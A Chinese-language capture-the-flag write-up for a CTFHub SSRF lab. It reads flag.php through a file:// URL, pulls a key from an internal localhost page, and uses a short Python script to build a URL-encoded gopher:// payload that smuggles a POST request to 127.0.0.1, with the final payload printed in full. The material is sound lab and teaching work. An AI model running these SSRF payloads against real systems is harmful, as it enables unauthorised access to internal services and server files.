CTFHUB-SSRF-POST请求

通过file协议访问flag.php文件内容

复制代码
?url=file:///var/www/html/flag.php

右键查看页面源代码

需要从内部携带key发送post数据包即可获得flag

复制代码
?url=http://127.0.0.1/flag.php

得到了key

构造POST请求数据包,进行url编码(新建一个txt文件,输入以下内容保存,修改为python文件,重命名为gopher.py

python 复制代码
# -*- coding: utf-8 -*
import urllib.parse
payload =\
"""
POST /flag.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

key=d554812847363980d21b2b1b87733501
"""
tmp = urllib.parse.quote(payload)
new = tmp.replace('%0A','%0D%0A')
result = 'gopher://127.0.0.1:80/'+'_'+new
result = urllib.parse.quote(result)
print(result)

在命令行窗口执行

复制代码
python gopher.py

通过Gopher协议发送请求,得到了flag

复制代码
?url=gopher%3A//127.0.0.1%3A80/_%250D%250APOST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250A%250D%250Akey%253Dd554812847363980d21b2b1b87733501%250D%250A
相关推荐
qq_谁赞成_谁反对2 小时前
klist.exe命令行工具,用来管理 Kerberos 身份验证系统
网络安全·内网安全·iam
Ancelin安心3 小时前
Windows搭建和使用vulhub的一些常用命令
linux·运维·服务器·网络安全·docker·容器·vulhub
安全渗透Hacker4 小时前
PHPStudy快速搭建DVWA靶场完整指南
安全·web安全·网络安全·安全性测试
AI科技星4 小时前
张祥前统一场论电荷定义方程分析报告
开发语言·经验分享·线性代数·算法·数学建模
两个蝴蝶飞4 小时前
Java量化系列(五):实现股票详细信息实时获取
经验分享
0DayHP4 小时前
HTB:Eighteen[WriteUP]
网络安全·内网渗透·web渗透
么么...5 小时前
掌握 MySQL:数据类型、数据定义语言DDL、数据操作语言DML
数据库·经验分享·sql·mysql
菜根Sec5 小时前
网络安全笑话
web安全·网络安全·渗透测试
老朱佩琪!5 小时前
快速做事经验分享
经验分享
中屹指纹浏览器6 小时前
2025边缘计算与本地指纹生成技术:浏览器指纹安全与抗检测方案解析
经验分享·笔记